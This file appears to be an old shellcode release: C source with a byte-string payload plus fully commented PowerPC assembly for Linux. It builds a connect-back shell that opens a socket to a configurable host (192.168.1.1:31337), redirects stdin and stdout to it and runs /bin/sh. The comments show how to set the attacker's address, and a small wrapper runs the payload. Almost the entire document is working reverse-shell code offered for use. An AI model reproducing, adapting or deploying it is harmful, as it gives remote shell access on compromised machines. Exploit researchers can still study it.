/* connect-core5.c by Charles Stevenson */ char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */ "\x7c\x3f\x0b\x78" /*mr r31,r1*/ "\x3b\x40\x01\x0e" /*li r26,270*/ "\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/ "\x7f\x43\xd3\x78" /*mr r3,r26*/ "\x3b\x60\x01\x0d" /*li r27,269*/ "\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/ "\x7f\x64\xdb\x78" /*mr r4,r27*/ "\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/ "\x7c\x3c\x0b\x78" /*mr r28,r1*/ "\x3b\x9c\x01\x0c" /*addi r28,r28,268*/ "\x90\x7c\xff\x08" /*stw r3,-248(r28)*/ "\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/ "\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ "\x7f\x63\xdb\x78" /*mr r3,r27*/ "\x3b\xdf\x01\x0c" /*addi r30,r31,268*/ "\x38\x9e\xff\x08" /*addi r4,r30,-248*/ "\x3b\x20\x01\x98" /*li r25,408*/ "\x7f\x20\x16\x70" /*srawi r0,r25,2*/ "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ "\x7c\x78\x1b\x78" /*mr r24,r3*/ "\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/ "\x7f\xbd\xea\x78" /*xor r29,r29,r29*/ // Craft your exploit to poke these value in. Right now it's set // for port 31337 and ip 192.168.1.1. Here's an example // core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 // 0xc0a8 // 0x0101 "\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/ "\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/ "\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/ "\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/ "\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/ "\x93\x1c\xff\x08" /*stw r24,-248(r28)*/ "\x3a\xde\xff\x16" /*addi r22,r30,-234*/ "\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/ "\x3b\xa0\x01\x1c" /*li r29,284*/ "\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/ "\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ "\x7f\x20\x16\x70" /*srawi r0,r25,2*/ "\x7c\x7a\xda\x14" /*add r3,r26,r27*/ "\x38\x9c\xff\x08" /*addi r4,r28,-248*/ "\x44\xde\xad\xf2" /*.long0x44deadf2*/ "\x7f\x03\xc3\x78" /*mr r3,r24*/ "\x7c\x84\x22\x78" /*xor r4,r4,r4*/ "\x3a\xe0\x01\xf8" /*li r23,504*/ "\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ "\x7f\x03\xc3\x78" /*mr r3,r24*/ "\x7f\x64\xdb\x78" /*mr r4,r27*/ "\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ // comment out the next 4 lines to save 16 bytes and lose stderr //"\x7f\x03\xc3\x78" /*mr r3,r24*/ //"\x7f\x44\xd3\x78" /*mr r4,r26*/ //"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ //"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ "\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ "\x42\x40\xff\x35" /*bdzl+ 10000454
*/ "\x7f\x08\x02\xa6" /*mflr r24*/ "\x3b\x18\x01\x34" /*addi r24,r24,308*/ "\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ "\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ "\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ "\x38\x81\xff\xf8" /*addi r4,r1,-8*/ "\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ "\x3b\xc0\x01\x60" /*li r30,352*/ "\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ "/bin/shZ"; /* Z will become NULL */ int main(void) { void (*shell)() = (void *)&hellcode; printf("%d byte connect back execve /bin/sh for linux/ppc by core\n", strlen(hellcode)); shell(); return 0; } #;;; PowerPC Linux Connect Back Shellcode #;;; #;;; This example connects /bin/sh to 192.168.1.1:31337 #;;; #;;; by Charles 'core' Stevenson #;;; #;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their #;;; significant research without which none of this would be possible. #;;; #;;; Fsck: drow for never sharing his shellcode. Security through #;;; obscurity never lasts forever man what did you expect? :) #;;; #;;; Note: Since this code is self modifying it'll crash if you just #;;; compile the .s and run it directly. ;-) Copy somewhere writable #;;; or run within gdb #;;; #;;; Last Updated: Wed Feb 16 20:14:43 MST 2005 #;;; * Swapped out addi with ori for IPv4 address creation so now #;;; all IPs should work AFAICT, swapped sc with .long 0x44deadf2 #;;; to save from having to fix the NULL bytes... and removed an #;;; unnesccesary instruction that got overlooked and left in LOL #;;; #;;; Revisions: Thu Aug 21 00:42:28 MDT 2003 #;;; * Fixed opcode, removed uneeded instruction and commented out stderr #;;; dup2() #;;; Mon Aug 12 23:12:52 MDT 2002 #;;; * Replaced execve with my own - core .globl main main: #;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!! #;; This critical step cost me HOURS upon hours in gdb stepping #;; through one instruction at a time! :/ mr %r31, %r1 #;; This section of the code creates a socket() #;; file descriptor for use with connect() #;; The next three sections setup the arguments for the #;; socket() syscall by storing values in registers 3-5 #;; AF_INET = 2 li %r26, 268 + 2 subi %r26, %r26, 268 mr %r3, %r26 #;; SOCK_STREAM = 1 li %r27, 268 + 1 subi %r27, %r27, 268 mr %r4, %r27 #;; IPPROTO_IP = 0 xor %r5, %r5, %r5 #; IPPROTO_IP #;; Push the values on the stack mr %r28, %r1 addi %r28, %r28, 268 stw %r3, -248(%r28) stw %r4, -244(%r28) stw %r5, -240(%r28) #;;; Setup the arguments for socketcall #;;; #;; r3 = 1 (socket?) mr %r3, %r27 #;; r4 = arg pointer addi %r30, %r31, 268 subi %r4, %r30, 268-20 #;; r0 = __NR_socketcall li %r25, 102*4 #; save 102 srawi %r0, %r25, 2 .long 0x44deadf2 #;sc #;; Save the socket file descriptor value mr %r24, %r3 #;;; This part sets up the sockaddr_in structure for the connect() #;;; call. #;; AF_INET = 2 sth %r26, -234(%r30) #;; PORT (No byte shift needed on BIG endian! :) xor %r29, %r29, %r29 ori %r29, %r29, 31337 #; elite port X-D sth %r29, -232(%r30) #;;; Ok.. here's how you get your ip value into this baby: #;;; #;;; This example is for IP address 192.168.0.1: #;;; #;;; $ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 0 1 #;;; 0xc0a8 #;;; 0x0001 #;; The first value (first half of X.X.x.x) lis %r29, 0xc0a8 #;; The second value (last half of x.x.X.X) ori %r29, %r29, 0x0101 #;; Store the address of the ip stw %r29, -230(%r30) #;;; Connect /bin/sh to server at ip and port given #;;; above. The first steps setup the arguments for the #;;; syscall. stw %r24, -248(%r28) #; push socket_fd subi %r22, %r30, 268-34 #; push &sa stw %r22, -244(%r28) li %r29, 268 + 16 #; sizeof(struct sockaddr_in) subi %r5, %r29, 268 stw %r5, -240(%r28) #; push sizeof(struct sockaddr_in) srawi %r0, %r25, 2 #; __NR_socketcall( add %r3, %r26, %r27 #; connect = 3, subi %r4, %r28, 268 - 20 #; argument pointer); .long 0x44deadf2 #;sc #;;; Setup I/O - here we duplicate stdin, stdout, and stderr #;;; to the socket file descriptor. Basically dup2() mr %r3, %r24 #; socket_fd xor %r4, %r4, %r4 #; stdin = 0 li %r23, 63 * 8 #; __NR_dup2 = 63 srawi %r0, %r23, 3 .long 0x44deadf2 #;sc mr %r3, %r24 #; socket_fd mr %r4, %r27 #; stdout = 1 srawi %r0, %r23, 3 .long 0x44deadf2 #;sc #;;; comment out this section to save 16 bytes and lose stderr #;;; mr %r3, %r24 #; socket_fd #;;; mr %r4, %r26 #; stderr = 2 #;;; srawi %r0, %r23, 3 #;;; .long 0x44deadf2 #;sc #;;; execve("/bin/sh",["/bin/sh",NULL],NULL); #;; GPR5 = 0 and CR = 0 #;; NOTE: xor != xor. (dot means update CR) #;; *** THANKS GHANDI!!! *** xor. %r5, %r5, %r5 #;; branch if counter is zero and store the address in #;; link register (counter is 0 since we just loaded it;) bdzl main + 200 #;; move the address of main to GPR24 mflr %r24 #;; get offset to /bin/sh addi %r24, %r24, 268 + 40 #;; add null to end of string stb %r5, -261(%r24) #;; store pointer to /bin/sh subi %r3, %r24, 268 stw %r3, -8(%r1) #;; r4 = argument pointer subi %r4, %r1, 8 #;; push environment pointer stw %r5, -4(%r1) #;; syscall(__NR_execve) li %r30, 11*32 srawi %r0, %r30, 5 .long 0x44deadf2 #;sc #;; /xxx/xxZ do not remove the Z! .ascii "/bin/shZ" #;;; EOF